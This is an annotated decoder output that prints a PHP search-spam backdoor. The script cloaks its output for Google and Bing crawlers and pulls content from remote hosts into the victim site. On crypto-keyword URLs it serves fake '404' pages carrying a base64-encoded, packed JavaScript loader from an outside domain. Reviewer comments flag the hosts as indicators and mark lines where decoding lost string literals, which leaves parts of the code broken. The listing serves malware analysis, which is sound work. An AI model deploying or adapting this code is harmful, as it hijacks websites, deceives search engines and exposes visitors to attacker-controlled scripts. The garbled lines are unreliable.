Online PHP and Javascript Decoder decode hidden script to uncover its real functionality


     
// Decoded configuration of a search-engine cloaking / link-injection script.
// NOTE(review): the three hostnames assigned below are the endpoints this listing
// contacts; they can be used as network indicators when reviewing proxy or DNS logs.
//  ini_set("error_reporting","E_ALL & ~E_NOTICE");
  ini_set('date.timezone','Asia/Shanghai');
  
  // Selects which branch of the if/else-if chain below runs; only 0, 1, 2 and 3 are handled.
  $proxy_modex = 2;
  

  // Sent to the remote endpoints as the "limit" query parameter; not used locally.
  $limit = 10000;
  
  
  // Pipe-separated keywords. search_flagx() looks for them (case-insensitively, as plain
  // substrings) in REQUEST_URI, and the whole string is also sent as the "flag" parameter.
  $inlink_flagx = "bitcoin|ethereum|litecoin|tron|chainlink|cardano|trx|usdt|btc|etc|xmr";


  // Passed to get_ads(), which derives the values it substitutes into its script template from this URL.
  $url_jsx = "https://tz.bwksma1.top/bnb.js";
  
  // Remote endpoint with the current Host header and request URI appended as the query string.
  // Both values come straight from the request and are concatenated without URL-encoding.
  $proxy_urlx = "http://usdt.choubaguai.top/index.php?".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
  
  // Base URL of the second remote endpoint; the branches below append "/index.php?flag=..." to it.
  $outlink_urlx = "http://link.choubaguai.top";

  
  // Substrings matched (case-insensitively) against the User-Agent header by info_checkx().
  $arr_uax = array("google", "bing");
  // Only referenced from commented-out conditions in this listing.
  $arr_refx = array("google", "bing");
//  $arr_uax = array("baidu", "sogou", "360", "yisou");
//  $arr_refx = array("baidu.com", "sogou.com", "so.com", "sm.cn");
  

  // Dispatch on $proxy_modex. Every mode first tests whether the User-Agent contains one of
  // the $arr_uax substrings, so the injected output is only served to matching clients;
  // a site owner browsing with an ordinary browser sees different output than such a client.
  // Everything echoed below is fetched from a remote host at request time and written into
  // the response unmodified, so the remote operator controls what the site serves.
  // NOTE(review): $_SERVER['HTTP_USER_AGENT'] is read without an isset() check.
  if($proxy_modex == 0)     // only the dynamic "spider pool" feature is enabled
  {
    // if this is a matching crawler visit, insert outbound links + dynamic internal links into this page
    if(info_checkx($_SERVER['HTTP_USER_AGENT'], $arr_uax))
    {
      // The Host header is appended to the outbound URL as-is (no URL-encoding).
      $outlink_urlx .= "/index.php?flag=".$inlink_flagx."&style=dynamic&limit=".$limit."&domain=".$_SERVER['HTTP_HOST'];
      $contentx = myrequestx($outlink_urlx, $_SERVER['HTTP_USER_AGENT']);
      echo $contentx;
    }
    
  }
  else if($proxy_modex == 1)    // only the static "spider pool" feature is enabled
  {

    if(info_checkx($_SERVER['HTTP_USER_AGENT'], $arr_uax))
    {
      $outlink_urlx .= "/index.php?flag=".$inlink_flagx."&style=static&limit=".$limit."&domain=".$_SERVER['HTTP_HOST'];
      $contentx = myrequestx($outlink_urlx, $_SERVER['HTTP_USER_AGENT']);
      echo $contentx;
    }
  }
  else if($proxy_modex == 2) 
  {
    if(info_checkx($_SERVER['HTTP_USER_AGENT'], $arr_uax))
    {
      if(search_flagx($inlink_flagx))
      {
        // Matching User-Agent and a keyword in the URI: the whole response body is replaced
        // by whatever the proxy endpoint returns, and the original page never runs (exit).
        // myrequestx() is called without a second argument here, so it sends its default User-Agent.
        $proxy_urlx .= "&flag=".$inlink_flagx."&style=dynamic&limit=".$limit."&domain=".$_SERVER['HTTP_HOST'];
        $contentx = myrequestx($proxy_urlx);
        echo $contentx;
        exit;
      }
      else
      {
        // Matching User-Agent, no keyword in the URI: remote content is echoed and execution
        // continues, so it is emitted in addition to whatever follows this code.
        $outlink_urlx .= "/index.php?flag=".$inlink_flagx."&style=dynamic&limit=".$limit."&domain=".$_SERVER['HTTP_HOST'];
        $contentx = myrequestx($outlink_urlx, $_SERVER['HTTP_USER_AGENT']);
        echo $contentx;
      }
    }
//    else if(strpos($_SERVER['REQUEST_URI'], "?") !== false && is_Mobile() && info_checkx($_SERVER["HTTP_REFERER"],$arr_refx))
    else if(search_flagx($inlink_flagx))
    {
      // Any other client whose URI contains a keyword gets a page that looks like a stock
      // "404 Not Found" error but carries the script block built by get_ads().
      // No header() call appears here, so the HTTP status is not set to 404 by this code.
      $codex = "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\r\n<html><head>\r\n<title>404 Not Found</title>\r\n</head><body>\r\n<h1>Not Found</h1>\r\n<p>The requested URL {url} was not found on this server.</p>\r\n{js}\r\n</body></html>\r\n";
      $jsx = get_ads($url_jsx);
      $codex = str_ireplace("{js}", $jsx, $codex);
      // REQUEST_URI is written into the HTML without escaping, so request-supplied markup
      // is reflected into the page as well.
      $contentx = str_ireplace("{url}", $_SERVER['REQUEST_URI'], $codex);
      echo $contentx;
      exit;
    }
  }
  else if($proxy_modex == 3)
  {
    // Same structure as mode 2, with "style=static" sent to the remote endpoints instead of "style=dynamic".
    if(info_checkx($_SERVER['HTTP_USER_AGENT'], $arr_uax))
    {
      if(search_flagx($inlink_flagx))
      {
        $proxy_urlx .= "&flag=".$inlink_flagx."&style=static&limit=".$limit."&domain=".$_SERVER['HTTP_HOST'];
        $contentx = myrequestx($proxy_urlx);
        echo $contentx;
        exit;
      }
      else
      {
        $outlink_urlx .= "/index.php?flag=".$inlink_flagx."&style=static&limit=".$limit."&domain=".$_SERVER['HTTP_HOST'];
        $contentx = myrequestx($outlink_urlx, $_SERVER['HTTP_USER_AGENT']);
        echo $contentx;
      }
    }
//    else if(search_flagx($inlink_flagx) && is_Mobile() && info_checkx($_SERVER["HTTP_REFERER"],$arr_refx))
    else if(search_flagx($inlink_flagx))
    {
      // Fake error page with the get_ads() script block; REQUEST_URI is inserted unescaped.
      $codex = "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\r\n<html><head>\r\n<title>404 Not Found</title>\r\n</head><body>\r\n<h1>Not Found</h1>\r\n<p>The requested URL {url} was not found on this server.</p>\r\n{js}\r\n</body></html>\r\n";
      $jsx = get_ads($url_jsx);
      $codex = str_ireplace("{js}", $jsx, $codex);
      $contentx = str_ireplace("{url}", $_SERVER['REQUEST_URI'], $codex);
      echo $contentx;
      exit;
    }
  }

  /**
   * Reports whether any element of $p_arr occurs in $p_str, ignoring case.
   *
   * In this listing it is called with the User-Agent header and $arr_uax, i.e. it is the
   * test that decides which clients receive the remotely fetched content.
   *
   * @param string $p_str Text to search (the User-Agent header at every call site shown).
   * @param array  $p_arr Substrings to look for.
   * @return int 1 on the first match, 0 if nothing matches.
   */
  function info_checkx($p_str, $p_arr)
  {
    $result = 0;
    foreach($p_arr as $value)
    {
      // Plain substring test: "google" matches any header that merely contains the word,
      // so the check says nothing about whether the client really is that crawler.
      if(stripos($p_str,$value)!==false)
      {
        $result = 1;
        break;
      }
    }
    return $result;
  }


  /**
   * Fetches $p_url with an HTTP GET through file_get_contents() and returns the body.
   *
   * NOTE(review): fetching a URL through file_get_contents() depends on the allow_url_fopen
   * setting; with it disabled this request path would fail.
   *
   * @param string $p_url URL to fetch.
   * @param string $p_ua  User-Agent header to send; defaults to "Googlebot".
   * @return string|false Whatever file_get_contents() returns.
   */
  function myrequestx($p_url, $p_ua="Googlebot")
    {
        // ignore_errors makes the stream wrapper return the body even for HTTP error statuses.
        $opts['http']['ignore_errors'] = true;
        $opts['http']['method'] = "GET";
    // Certificate verification is switched off and self-signed certificates are accepted,
    // so an https endpoint is not authenticated by this request.
    $opts['ssl']['verify_peer'] = false;
    $opts['ssl']['allow_self_signed'] = true;
      
        $header_default = array();
    $header_default['User-Agent'] = $p_ua;
    $header_default['Accept'] = "*/*";
    $header_default['Accept-Language'] = "zh-CN";
//    $header_default['Accept-Encoding'] = "gzip, deflate";
    $header_default['Connection'] = "Close";
      
        // Serialise the header map into "Name: value\r\n" lines, skipping empty values.
        $result = "";
      foreach($header_default as $key=>$value)
    {
      if($value != "")
      {
        $result .= $key.": ".$value."\r\n";
      }
    }
        
      $opts['http']['header'] = $result;
      $context = stream_context_create($opts);
    $contentx = file_get_contents($p_url, false, $context);
    
    return $contentx;
    }


  /**
   * Reports whether the User-Agent header contains one of a fixed list of mobile-device
   * substrings, ignoring case.
   *
   * Nothing in this listing calls this function; the commented-out conditions above
   * refer to is_Mobile(), which is not defined here.
   *
   * @return int 1 if a substring matches, 0 otherwise.
   */
  function is_Mobilexxx()
  {
    $str = "phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone";
    $arr = explode("|", $str);
    $result = 0;
    foreach($arr as $value)
    {
      if(stripos($_SERVER['HTTP_USER_AGENT'],$value)!==false)
      {
        $result = 1;
        break;
      }
    }
    return $result;
  }


  /**
   * Reports whether the current request URI contains any keyword from a pipe-separated list.
   *
   * @param string $p_flag Keywords separated by "|" ($inlink_flagx at every call site shown).
   * @return int 1 if any keyword occurs in REQUEST_URI (case-insensitive), 0 otherwise.
   */
  function search_flagx($p_flag)
  {
    $arr = explode("|", $p_flag);
    $number = count($arr);
    $result = 0;
    $myuri = $_SERVER['REQUEST_URI'];
    for($i = 0; $i < $number; $i ++)
    {
      // Substring match anywhere in the URI, including the query string. Short keywords in
      // the configured list such as "etc" or "btc" therefore match many unrelated paths,
      // which matters when estimating from access logs how many requests hit this code.
      if(stripos($myuri, $arr[$i]) !== false)
      {
        $result = 1;
        break;
      }
    }
    
    return $result;
  }



  /**
   * Builds the HTML script block that the fake "404" pages embed.
   *
   * A base64-encoded template is decoded and three placeholders in it ({domain1},
   * {domain2}, {name}) are filled with pieces of $p_url: parts of its host name and
   * its file name without the ".js" extension.
   *
   * NOTE(review): two statements in this function (marked below) are missing a string
   * literal in the decoder output, so the function does not parse as listed.
   *
   * @param string $p_url URL of the remote script ($url_jsx at every call site shown).
   * @return string The template with its placeholders substituted.
   */
  function get_ads($p_url)
  {
    // Decodes to a <script type="text/javascript"> element whose body starts with
    // eval(function(p,a,c,k,e,r){...}), i.e. packed JavaScript; its word table carries the
    // {domain1}, {domain2} and {name} placeholders substituted further down.
    $model = "PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmV2YWwoZnVuY3Rpb24ocCxhLGMsayxlLHIpe2U9ZnVuY3Rpb24oYyl7cmV0dXJuKGM8YT8nJzplKHBhcnNlSW50KGMvYSkpKSsoKGM9YyVhKT4zNT9TdHJpbmcuZnJvbUNoYXJDb2RlKGMrMjkpOmMudG9TdHJpbmcoMzYpKX07aWYoIScnLnJlcGxhY2UoL14vLFN0cmluZykpe3doaWxlKGMtLSlyW2UoYyldPWtbY118fGUoYyk7az1bZnVuY3Rpb24oZSl7cmV0dXJuIHJbZV19XTtlPWZ1bmN0aW9uKCl7cmV0dXJuJ1xcdysnfTtjPTF9O3doaWxlKGMtLSlpZihrW2NdKXA9cC5yZXBsYWNlKG5ldyBSZWdFeHAoJ1xcYicrZShjKSsnXFxiJywnZycpLGtbY10pO3JldHVybiBwfSgnbShkKHAsYSxjLGssZSxyKXtlPWQoYyl7ZiBjLm4oYSl9O2goIVwnXCcuaSgvXi8sbykpe2ooYy0tKXJbZShjKV09a1tjXXx8ZShjKTtrPVtkKGUpe2YgcltlXX1dO2U9ZCgpe2ZcJ1xcXFx3K1wnfTtjPTF9O2ooYy0tKWgoa1tjXSlwPXAuaShxIHMoXCdcXFxcYlwnK2UoYykrXCdcXFxcYlwnLFwnZ1wnKSxrW2NdKTtmIHB9KFwnMVsiMiJdWyIzIl0oXFxcJzwwIDQ9IjUvNiIgNz0iODovLzkuYS9iLmMiPjwvMD5cXFwnKTtcJyxsLGwsXCd0fHV8dnx4fHl8enxBfEJ8Q3xEfEV8RnxHXCcuSChcJ3xcJyksMCx7fSkpJyw0NCw0NCwnfHx8fHx8fHx8fHx8fGZ1bmN0aW9ufHxyZXR1cm58fGlmfHJlcGxhY2V8d2hpbGV8fDEzfGV2YWx8dG9TdHJpbmd8U3RyaW5nfHxuZXd8fFJlZ0V4cHxzY3JpcHR8d2luZG93fGRvY3VtZW50fHx3cml0ZXx0eXBlfHRleHR8amF2YXNjcmlwdHxzcmN8aHR0cHN8e2RvbWFpbjF9fHtkb21haW4yfXx7bmFtZX18anN8c3BsaXQnLnNwbGl0KCd8JyksMCx7fSkpPC9zY3JpcHQ+";
    $model = base64_decode($model);
  
    $url = $p_url;
  
    // Host part of the URL, then the shorter domain that top_domain() derives from it.
    $domain_all = regular_domain($url);
    $domain_top = top_domain($domain_all);
  
    // Whatever precedes the derived domain inside the full host name.
    $part1 = str_ireplace($domain_top, "", $domain_all);
    // NOTE(review): explode() has no first argument in the decoder output; a string literal
    // appears to have been lost in decoding. Compare with the raw sample before relying on this line.
    $arr = explode(, $domain_top);
    $part2 = $arr[0];
    // NOTE(review): the operand after the "." operator is missing here for the same reason.
    $part3 = str_ireplace($part2., "", $domain_top);
  
    // Replace "<derived domain>/" with a space and split on it; index 1 is the text that followed it in the URL.
    $str = str_ireplace($domain_top."/", " ", $url);
    $arr = explode(" ", $str);
    $name = $arr[1];
    $name = str_ireplace(".js", "", $name);
  
    $model = str_ireplace("{domain1}", $part1.$part2, $model);
    $model = str_ireplace("{domain2}", $part3, $model);
    $model = str_ireplace("{name}", $name, $model);
  
    return $model;
  }

  
  

  
  
/**
 * Reduces a URL to its lower-cased host part.
 *
 * Strips a leading "http://" or "https://" (compared case-sensitively) and cuts the
 * string at the first "/". A port or userinfo component, if present, is left in place.
 *
 * @param string $domain URL or host name.
 * @return string Lower-cased text before the first "/".
 */
function regular_domain($domain)
{
  if (substr ( $domain, 0, 7 ) == 'http://') {
    $domain = substr ( $domain, 7 );
  }
  else if(substr ( $domain, 0, 8 ) == 'https://') {
    $domain = substr ( $domain, 8 );
  }
  
  if (strpos ( $domain, '/' ) !== false) {
    $domain = substr ( $domain, 0, strpos ( $domain, '/' ) );
  }
  return strtolower ( $domain );
}

/**
 * Derives a shorter domain from a host name using a hard-coded suffix list.
 *
 * Walking the host's labels from right to left (never looking at the left-most one), it
 * collects up to two labels found in $iana_root and then prepends the label immediately
 * to the left of them.
 *
 * NOTE(review): two statements in this function (marked below) are missing a string
 * literal in the decoder output, so the function does not parse as listed.
 *
 * @param string $domain URL or host name; normalised with regular_domain() first.
 * @return string The derived domain.
 */
function top_domain($domain)
{
  $domain = regular_domain( $domain );
  // Hard-coded suffix list. The variable name refers to IANA, but the list is a literal in
  // this file and has not been checked against the root zone. The first row holds four
  // entries that sit outside the alphabetical order of the rest.
  $iana_root = array (
      'xyz', 'top', 'win', 'life',
      'ac',
      'ad',
      'ae',
      'aero',
      'af',
      'ag',
      'ai',
      'al',
      'am',
      'an',
      'ao',
      'aq',
      'ar',
      'arpa',
      'as',
      'asia',
      'at',
      'au',
      'aw',
      'ax',
      'az',
      'ba',
      'bb',
      'bd',
      'be',
      'bf',
      'bg',
      'bh',
      'bi',
      'biz',
      'bj',
      'bl',
      'bm',
      'bn',
      'bo',
      'bq',
      'br',
      'bs',
      'bt',
      'bv',
      'bw',
      'by',
      'bz',
      'ca',
      'cat',
      'cc',
      'cd',
      'cf',
      'cg',
      'ch',
      'ci',
      'ck',
      'cl',
      'cm',
      'cn',
      'co',
      'com',
      'coop',
      'cr',
      'cu',
      'cv',
      'cw',
      'cx',
      'cy',
      'cz',
      'de',
      'dj',
      'dk',
      'dm',
      'do',
      'dz',
      'ec',
      'edu',
      'ee',
      'eg',
      'eh',
      'er',
      'es',
      'et',
      'eu',
      'fi',
      'fj',
      'fk',
      'fm',
      'fo',
      'fr',
      'ga',
      'gb',
      'gd',
      'ge',
      'gf',
      'gg',
      'gh',
      'gi',
      'gl',
      'gm',
      'gn',
      'gov',
      'gp',
      'gq',
      'gr',
      'gs',
      'gt',
      'gu',
      'gw',
      'gy',
      'hk',
      'hm',
      'hn',
      'hr',
      'ht',
      'hu',
      'id',
      'ie',
      'il',
      'im',
      'in',
      'info',
      'int',
      'io',
      'iq',
      'ir',
      'is',
      'it',
      'je',
      'jm',
      'jo',
      'jobs',
      'jp',
      'ke',
      'kg',
      'kh',
      'ki',
      'km',
      'kn',
      'kp',
      'kr',
      'kw',
      'ky',
      'kz',
      'la',
      'lb',
      'lc',
      'li',
      'lk',
      'lr',
      'ls',
      'lt',
      'lu',
      'lv',
      'ly',
      'ma',
      'mc',
      'md',
      'me',
      'mf',
      'mg',
      'mh',
      'mil',
      'mk',
      'ml',
      'mm',
      'mn',
      'mo',
      'mobi',
      'mp',
      'mq',
      'mr',
      'ms',
      'mt',
      'mu',
      'museum',
      'mv',
      'mw',
      'mx',
      'my',
      'mz',
      'na',
      'name',
      'nc',
      'ne',
      'net',
      'nf',
      'ng',
      'ni',
      'nl',
      'no',
      'np',
      'nr',
      'nu',
      'nz',
      'om',
      'org',
      'pa',
      'pe',
      'pf',
      'pg',
      'ph',
      'pk',
      'pl',
      'pm',
      'pn',
      'pr',
      'pro',
      'ps',
      'pt',
      'pw',
      'py',
      'qa',
      're',
      'ro',
      'rs',
      'ru',
      'rw',
      'sa',
      'sb',
      'sc',
      'sd',
      'se',
      'sg',
      'sh',
      'si',
      'sj',
      'sk',
      'sl',
      'sm',
      'sn',
      'so',
      'sr',
      'ss',
      'st',
      'su',
      'sv',
      'sx',
      'sy',
      'sz',
      'tc',
      'td',
      'tel',
      'tf',
      'tg',
      'th',
      'tj',
      'tk',
      'tl',
      'tm',
      'tn',
      'to',
      'tp',
      'tr',
      'travel',
      'tt',
      'tv',
      'tw',
      'tz',
      'ua',
      'ug',
      'uk',
      'um',
      'us',
      'uy',
      'uz',
      'va',
      'vc',
      've',
      'vg',
      'vi',
      'vn',
      'vu',
      'wf',
      'ws',
      'xxx',
      'ye',
      'yt',
      'za',
      'zm',
      'zw'
  );
  // NOTE(review): explode() has no first argument in the decoder output; a string literal
  // appears to have been lost in decoding. Compare with the raw sample before relying on this line.
  $sub_domain = explode ( , $domain );
  $top_domain = '';
  $top_domain_count = 0;
  // Scan labels right to left, stopping after two suffix labels have been collected.
  for($i = count ( $sub_domain ) - 1; $i >= 0; $i --) {
    if ($i == 0) {
      // just in case of something like NAME.COM
      break;
    }
    if (in_array ( $sub_domain [$i], $iana_root )) {
      $top_domain_count ++;
      // NOTE(review): the left operand of the first "." operator is missing here for the same reason.
      $top_domain =  . $sub_domain [$i] . $top_domain;
      if ($top_domain_count >= 2) {
        break;
      }
    }
  }
  // Prepend the label that sits immediately left of the collected suffix labels.
  $top_domain = $sub_domain [count ( $sub_domain ) - $top_domain_count - 1] . $top_domain;
  return $top_domain;
}


